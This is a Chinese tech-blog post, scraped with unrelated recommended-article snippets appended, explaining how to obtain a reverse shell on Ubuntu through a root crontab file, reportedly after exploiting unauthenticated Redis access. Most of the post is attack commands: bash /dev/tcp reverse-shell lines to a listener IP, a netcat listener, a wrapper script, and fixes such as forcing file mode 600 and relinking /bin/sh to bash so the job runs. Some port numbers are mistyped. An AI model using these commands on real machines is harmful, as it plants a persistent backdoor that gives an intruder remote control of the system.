ubuntu利用crontab反弹shell_ubuntu新增crontab反弹shell-程序员宅基地

事情源于自，我利用redis未授权访问漏洞在向ubuntu的/varspool/cron/crontabs目录下创建的任务计划文件去反弹shell时，发现shell并不能反弹到自己的centos2上

（1）在ubuntu中进入/var/spool/cron/crontabs/目录

cd /var/spool/cron/crontabs/

（2）新建一个名为root的任务计划文件

touch root

注：root文件的权限必须是600，否则会出现错误影响后面的实验

（3）编辑内容

* * * * * '/bin/bash -i >& /dev/tcp/192.168.159.201/123456 0>&1'

（4）在centos2上监听着 12345端口

 nc -lvvp 12345

这时按道理来说我们监听了后就应该回弹的，这里等待了一会后并没有回弹

（5）现在查看日志

tail  -l /var/log/syslog
Sep 26 09:18:01 ubuntu-virtual-machine cron[568]: (root) INSECURE MODE (mode 0600 expected) (crontabs/root)

通过日志我们可以发现权限644有问题

（6）现在尝试给root文件授权为600

 chmod  600 root

这时还是并没有回弹

（7）现在就还尝试将root文件删除后，直接在创建时授权为600

root@utuntu000:/var/spool/cron/crontabs# rm -rf root
root@utuntu000:/var/spool/cron/crontabs# touch root
root@utuntu000:/var/spool/cron/crontabs# chmod 600 root

然后给root中再次编辑内容

（8）然后再次尝试回弹

这时还是并没有回弹

（9）这是再次去查看报错日志

tail  -l /var/log/syslog

这一条，我们之所以反弹失败，和这句话有很大的关系，百度一番后，大概的意思就是我们任务计划中的命令执行如果出现了错误，ubunti会将这些错误信息去输出到ubutu系统的邮件服务器，但是由于ubuntu系统默认没有安装邮件服务器，所以导致了这个错误

（10）修改任务计划文件为

* * * * * '/bin/bash -i >& /dev/tcp/192.168.159.201/12345 0>&1' >/tmp/error.txt 2>&1
//将错误输出到指定文件夹

（11）现在去查看 /tmp/error.txt文件查看报错信息

tail /tmp/error.txt

这里的错误表示：执行它的/bin/bash没有被找到，因为这个文件是使用/bin/sh执行的

可以使用ls -al查看/bin/sh，发现/bin/sh 是dash的一个软连接

（12）解决方案

方法1：修改软连接的指向为/bin/bash

 ln -s -f bash /bin/sh

并且将root文件修改为：

* * * * * '/bin/bash -i >& /dev/tcp/192.168.159.201/12345 0>&1'

注：为什么centos就没有这个问题，因为centos默认的处理方式就是/bin/bash

现在再次尝试反弹

就可以看到成功的反弹了

方法2：就是避免在cron文件里面去使用bash这个shell，我们可以另外的去建立一个反弹shell脚本文件，然后去任务计划里面直接调用这个脚本文件

shell脚本文件如下，名为tmp/test.sh

#!bin/bash
/bin/bash -i > &/dev/tcp/192.168.159.201/12345 0>&1

然后为test.sh加上执行权限

chmod +x /tmp/test.sh

之后任务计划里面的内容修改为

* * * * * /tmp/test.sh

最后尝试反弹

可以看到成功的反弹了shell

方法3：直接使用sh

修改文件为

*/1 * * * * bash -c  '/bin/bash -i >& /dev/tcp/192.168.159.201/123456 0>&1'

不用修改链接指向，直接在sh下执行bash -c

可以看到已经成功的弹窗了！

本文链接：https://blog.csdn.net/qq_68163788/article/details/134387388

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

linux配置的jmeter环境变量_linux配置jmeter环境变量-程序员宅基地

在CentOS 7系统中配置非root用户的jmeter环境变量，通过编辑.bash_profile文件并添加export JMET命令来配置。确保配置生效后，可通过java -version命令查看java版本信息。参考链接：知乎和程序员宅基地。

L2-039 清点代码库 - java_l2-039 清点代码库 java-程序员宅基地

文章浏览阅读7.6k次。L2-039 清点代码库 (25 分)Java (javac)时间限制1500 ms内存限制128 MBPython (python3)时间限制1500 ms内存限制64 MB其他编译器时间限制500 ms内存限制64 MB上图转自新浪微博：“阿里代码库有几亿行代码，但其中有很多功能重复的代码，比如单单快排就被重写了几百遍。请设计一个程序，能够将代码库中所有功能重复的代码找出。各位大佬有啥想法，我当时就懵了，然后就挂了。。。”这里我们把问题简化一下：首先假设两个功能模_l2-039 清点代码库 java

PTA:完全二叉搜索树 (25 分)_完全二叉搜索树分数 10 作者陈越单位浙江大学一个无重复的非负整数序列,必定-程序员宅基地

文章浏览阅读922次，点赞2次，收藏6次。题目详情：一个无重复的非负整数序列，必定对应唯一的一棵形状为完全二叉树的二叉搜索树。本题就要求你输出这棵树的层序遍历序列。输入格式：首先第一行给出一个正整数N（≤1000），随后第二行给出N个不重复的非负整数。数字间以空格分隔，所有数字不超过 2000。输出格式：在一行中输出这棵树的层序遍历序列。数字间以 1 个空格分隔，行首尾不得有多余空格。输入样例：101 2 3 4 5 6 7 8 9 0结尾无空行输出样例：6 3 8 1 5 7 9 0 2 4..._完全二叉搜索树分数 10 作者陈越单位浙江大学一个无重复的非负整数序列,必定

[2020.8.3]联想 ZUK Z1 Magisk ROOT 纯净无推广一键刷机 ZUI_-程序员宅基地

文章浏览阅读72次。教程本刷机包比一般的大，是因为同时适配recovery卡刷和酷卓一键刷机。但是刷进系统后和普通刷机包都是一样的。注意事项(务必细读) 联想 ZUK Z1 免解锁BL(bootloader)，一键ROOT是保资料的，刷机是会清空数据的(无论如何都请备份重要数据)卡刷方法卡刷需要已经安装了twrp recovery，直接传入手机后用twrp recovery刷机，和普通刷机包使用无区别..._zukz1被root了怎么办

数据结构与算法分析 3.26 — 双端队列的实现-程序员宅基地

文章浏览阅读590次。一、题目编写支持双端队列的例程，插入与弹出操作均花费 O(1)时间二、解答双端队列（deque，全名double-ended queue）是一种具有队列和栈性质的数据结构。双端队列中的元素可以从两端弹出，插入和删除操作限定在队列的两边进行。基本操作：在双端队列两端插入与删除。 ADT术语： ..._编写算法实现双端队列。数据结构分析

centos7安装clion_clion centos-程序员宅基地

文章浏览阅读4.2k次。centos7安装clion下载clion的linux包。上传到linux服务器下。scp -P 20211 E:\迅雷下载\cmake-3.14.3.tar.gz 用户名@服务器地址:/home/bob/解压并到解压的文件夹bin目录下。运行命令“./clion.sh”。（需在centos7图形界面模式下才能启动clion）启动之后还不能运行c语言程序，我们还需要安装gcc、..._clion centos